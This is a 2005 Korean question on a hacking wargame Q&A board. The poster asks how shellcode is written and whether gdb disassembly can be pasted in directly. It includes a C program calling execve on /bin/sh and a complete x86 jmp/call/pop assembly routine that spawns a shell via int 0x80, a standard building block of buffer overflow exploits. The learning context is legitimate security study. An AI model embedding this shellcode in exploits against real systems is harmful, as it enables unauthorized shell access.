레벨 해킹

2844,

9/143

tinlove21

쉘코드 작성 과정에 대한 간단한 질문^^

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=1499 [복사]

이런 c 소스를 어셈으로 컴파일해서 얻은 코드로

main()
{
  char * name[2] ;
  name[0] = "/bin/sh";
  name[1] = NULL ;
  execve(name[0] , name, NULL) ;
}

강좌에보면 아래와 비슷한 어셈 코드로 다시 코딩하던데..
그냥 gdb 같은걸로 역어셈한 코드를 main: 부분에다가 그대로
가져다 붙이면 안되나요?..

그게 아니라면,
항상 쉘코드를 제작할때 아래와 같은 어셈코드를
유추를 해가면서 손수 제작해야 하는건가요?..

어셈을 모르면 만들줄 모르잖아요 ㅠㅠㅠㅠ...
답변부탁드립니다.

다들 쉘코드 만드실때 c프로그램을 gdb로 역어셈한걸 토대로
다시 손수 어셈소스를 작성하나요?..

이번에 좀 확고히 이해하고 십습니다^^
다른 개념들은 많은 문서를 읽어봐서 거의다 알거같은데
이제 쉘코드를 손수 작성해보고 싶거든요.. (그동안에는 남이만든것
복사만 해서 컴파일하고 공부해봤는데...)
이제 손수만들어보고 싶습니다. 좀 자세히좀 답글달아주시면
은혜 잊지 않겠습니다^^..

이제막 해킹에 재미가 들려서요^^;;...
메모리를 변경하고 등등... 너무 잼있네요 ㅋㅋ

.global main
main :
        jmp     strings

start:  popl    %esi
        movb    $0x00, 0x7(%esi)
        movl    %esi , 0x8(%esi)
        movl    $0x00, 0xc(%esi)
        movl    $0x0b, %eax
        movl    %esi, %ebx
        leal    0x8(%esi), %ecx
        movl    0xc(%esi), %edx
        int     $0x80

        movl    $0x01, %eax
        movl    $0x00, %ebx
        int     $0x80

strings: call start
        .string "/bin/sh"

Hit : 1631 Date : 2005/01/14 01:32